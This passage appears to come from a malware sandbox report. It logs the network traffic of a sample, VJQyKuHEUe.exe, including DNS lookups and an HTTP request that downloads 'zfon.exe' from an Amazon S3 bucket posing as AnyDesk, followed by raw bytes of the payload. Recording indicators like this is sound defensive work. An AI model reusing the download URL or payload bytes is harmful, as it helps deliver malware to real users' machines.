                                                                                              Dec 18, 2024 13:05:58.911787987 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:58.911798954 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:58.911807060 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:58.911835909 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:58.911861897 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:58.911883116 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:58.919373035 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:58.919517040 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:58.919579029 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:58.919588089 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:58.971785069 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.016778946 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.016807079 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.016854048 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.016880035 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.016885042 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.016925097 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.016953945 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.016974926 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.017009020 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.017014980 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.065550089 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.090377092 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.090388060 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.090404987 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.090411901 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.090451956 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.090482950 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.090496063 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.090522051 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.090528011 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.112724066 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.112749100 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.112778902 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.112791061 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.112809896 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.112828016 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.131925106 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.131973982 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.131993055 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.132006884 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.132021904 CET443497223.5.238.183192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.132030964 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.132071972 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.132544994 CET49722443192.168.2.53.5.238.183
                                                                                              Dec 18, 2024 13:05:59.283111095 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:05:59.283165932 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:05:59.283231974 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:05:59.283546925 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:05:59.283561945 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.099994898 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.109802008 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:01.109827042 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.843612909 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.893672943 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.893683910 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:01.893695116 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.893719912 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.893732071 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.893759012 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.893811941 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:01.893822908 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.893867970 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:01.893867970 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.074455023 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.074520111 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.074559927 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.074568033 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.074640036 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.872498989 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.872526884 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.872534990 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.872605085 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.872621059 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.872651100 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.872677088 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.873455048 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.880829096 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.880846024 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.880873919 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.880898952 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.880907059 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.880959034 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.880966902 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.881110907 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.887876034 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.887892962 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.887953997 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.887964010 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.888008118 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.888015032 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.896645069 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.896671057 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.896708965 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.896718979 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.896753073 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.921789885 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.921840906 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.921960115 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.921988010 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.938334942 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.938390017 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.938412905 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.938488007 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.938509941 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.938560009 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.945327044 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.945343971 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.945424080 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.945452929 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.945461988 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.945517063 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.952495098 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.952512026 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.952574968 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.952581882 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.952706099 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.954632044 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.955131054 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:06.235918999 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:06.235955000 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:06.236116886 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:06.236501932 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:06.236512899 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:08.205689907 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:08.207365990 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:08.207376957 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.012892008 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.065644979 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.271927118 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.271944046 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.271965027 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.271972895 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.271994114 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.271996975 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.272017002 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.272047997 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.272079945 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.733428001 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.733464956 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.733513117 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.733515024 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.733540058 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.733549118 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.733578920 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.733591080 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.733633995 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.733700037 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.784282923 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.006635904 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.006654978 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.006679058 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.006691933 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.006722927 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.006732941 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.006762028 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.006773949 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.006778002 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.049957037 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.359816074 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.359832048 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.359857082 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.359899044 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.359922886 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.359940052 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.359972000 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.360034943 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.601563931 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.643682957 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.698970079 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.698992014 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699018002 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699035883 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699047089 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699062109 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699162960 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.699162960 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.699177027 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699192047 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.699238062 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.753289938 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.947529078 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.947545052 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.947587967 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.947599888 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.947633982 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.947647095 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.947688103 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.947688103 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.958344936 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.003093004 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.199079990 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.199107885 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.199152946 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.199176073 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.199182034 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.199198008 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.199248075 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.199248075 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.441274881 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.441294909 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.441320896 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.441430092 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.441430092 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.441445112 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.441492081 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.452043056 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.503196001 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.690045118 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.690057993 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.690109968 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.690118074 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.690277100 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.690290928 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.690336943 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.911842108 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.911853075 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.911909103 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.911947966 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.911993980 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.912005901 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:11.912019968 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:11.912363052 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.138681889 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.138708115 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.138832092 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.138842106 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.138892889 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.145194054 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.185436964 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.185461044 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.185606956 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.185619116 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.237462044 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.237473965 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.284359932 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.394427061 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.394440889 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.394494057 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.394498110 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:12.394519091 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.394539118 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:12.394551039 CET49749443192.168.2.552.95.161.33
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 13:05:40.168242931 CET | 53001 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 13:05:40.377370119 CET | 53 | 53001 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 13:05:51.576292992 CET | 58228 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 13:05:51.780801058 CET | 53 | 58228 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 13:05:59.143595934 CET | 51830 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 13:05:59.281693935 CET | 53 | 51830 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 13:06:05.979022980 CET | 61605 | 53 | 192.168.2.5 | 1.1.1.1
Dec 18, 2024 13:06:06.234361887 CET | 53 | 61605 | 1.1.1.1 | 192.168.2.5
Dec 18, 2024 13:06:29.887763023 CET | 51896 | 53 | 192.168.2.5 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 13:05:40.168242931 CET | 192.168.2.5 | 1.1.1.1 | 0xa0d3 | Standard query (0) | anydesk17.s3.ap-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:05:51.576292992 CET | 192.168.2.5 | 1.1.1.1 | 0x1df8 | Standard query (0) | anydesk17.s3.ap-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:05:59.143595934 CET | 192.168.2.5 | 1.1.1.1 | 0x1125 | Standard query (0) | anydesk17.s3.ap-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:05.979022980 CET | 192.168.2.5 | 1.1.1.1 | 0x7cae | Standard query (0) | anydesk17.s3.ap-east-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:29.887763023 CET | 192.168.2.5 | 1.1.1.1 | 0x7cef | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 13:05:40.377370119 CET | 1.1.1.1 | 192.168.2.5 | 0xa0d3 | No error (0) | anydesk17.s3.ap-east-1.amazonaws.com | s3-r-w.ap-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 13:05:40.377370119 CET | 1.1.1.1 | 192.168.2.5 | 0xa0d3 | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 3.5.237.31 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:05:40.377370119 CET | 1.1.1.1 | 192.168.2.5 | 0xa0d3 | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 3.5.238.29 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:05:51.780801058 CET | 1.1.1.1 | 192.168.2.5 | 0x1df8 | No error (0) | anydesk17.s3.ap-east-1.amazonaws.com | s3-r-w.ap-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 13:05:51.780801058 CET | 1.1.1.1 | 192.168.2.5 | 0x1df8 | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 3.5.238.183 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:05:51.780801058 CET | 1.1.1.1 | 192.168.2.5 | 0x1df8 | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 52.95.162.58 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:05:59.281693935 CET | 1.1.1.1 | 192.168.2.5 | 0x1125 | No error (0) | anydesk17.s3.ap-east-1.amazonaws.com | s3-r-w.ap-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 13:05:59.281693935 CET | 1.1.1.1 | 192.168.2.5 | 0x1125 | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 3.5.239.146 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:05:59.281693935 CET | 1.1.1.1 | 192.168.2.5 | 0x1125 | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 52.95.161.53 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:06.234361887 CET | 1.1.1.1 | 192.168.2.5 | 0x7cae | No error (0) | anydesk17.s3.ap-east-1.amazonaws.com | s3-r-w.ap-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 13:06:06.234361887 CET | 1.1.1.1 | 192.168.2.5 | 0x7cae | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 52.95.161.33 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:06.234361887 CET | 1.1.1.1 | 192.168.2.5 | 0x7cae | No error (0) | s3-r-w.ap-east-1.amazonaws.com | | 52.95.160.78 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 13:06:30.024620056 CET | 1.1.1.1 | 192.168.2.5 | 0x7cef | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
• anydesk17.s3.ap-east-1.amazonaws.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49710 | 3.5.237.31 | 443 | 1472 | C:\Users\user\Desktop\VJQyKuHEUe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:05:42 UTC | 94 | OUT | GET /zfon.exe HTTP/1.1
Host: anydesk17.s3.ap-east-1.amazonaws.com
Connection: Keep-Alive
2024-12-18 12:05:43 UTC | 447 | IN | HTTP/1.1 200 OK
x-amz-id-2: ZveAHjRBx716hkN64ZfUR7XXfnibshdG4f++qUuoZ0blm5PE27loBiFPDhGAyzAyOln4Qbfo3M56jJIO1F0jSHN8BY8/kEtn
x-amz-request-id: KQR1N4PHTFS88F6Q
Date: Wed, 18 Dec 2024 12:05:44 GMT
Last-Modified: Fri, 13 Dec 2024 18:14:06 GMT
ETag: "44ad77338a945fe1451861b59267a68d"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Content-Type: binary/octet-stream
Content-Length: 2659840
Server: AmazonS3
Connection: close
                                                                                              Data Ascii: HLHHtHPH8@SH0HD$ HuHHHHcHHLHHtHPH0[@WH@HD$ H\$PHt$XHHHD$(LB3HHJHHOHL$0LGHt3Au$H\$0HHPsuHL$0HPHH\$PHt$XH@_H\$
                                                                                              2024-12-18 12:05:43 UTC1024INData Raw: 08 40 32 ff e9 d6 01 00 00 4c 89 74 24 20 48 8d 45 f8 48 89 44 24 28 c6 44 24 30 00 48 8b 0b 48 8b 01 48 8d 95 a8 00 00 00 ff 10 90 48 8b 08 48 8b 01 48 8d 54 24 38 ff 50 08 90 48 8b 85 a8 00 00 00 48 85 c0 74 16 48 8b 48 08 48 63 51 04 48 8d 48 08 48 03 ca 48 8b 01 ff 50 08 90 48 8b 44 24 28 48 8b 4c 24 40 48 85 c9 74 07 48 83 79 08 00 75 14 48 85 c0 0f 84 fa 00 00 00 48 83 78 08 00 0f 84 ef 00 00 00 48 85 c9 74 2e 48 83 79 08 00 74 27 48 85 c0 74 22 48 83 78 08 00 74 1b 48 8b d0 e8 93 0e 01 00 85 c0 75 0f 48 8b 44 24 28 48 8b 4c 24 40 e9 bc 00 00 00 48 8d 15 79 6f 1d 00 48 8d 4c 24 70 e8 3f 07 ff ff 90 c7 85 a8 00 00 00 01 00 00 00 48 8b 5c 24 78 48 8b 4c 24 40 48 85 c9 74 07 48 83 79 08 00 75 0c 48 85 db 74 2b 48 83 7b 08 00 74 24 48 85 c9 74 43 48 83
                                                                                              Data Ascii: @2Lt$ HEHD$(D$0HHHHHHT$8PHHtHHHcQHHHHPHD$(HL$@HtHyuHHxHt.Hyt'Ht"HxtHuHD$(HL$@HyoHL$p?H\$xHL$@HtHyuHt+H{t$HtCH
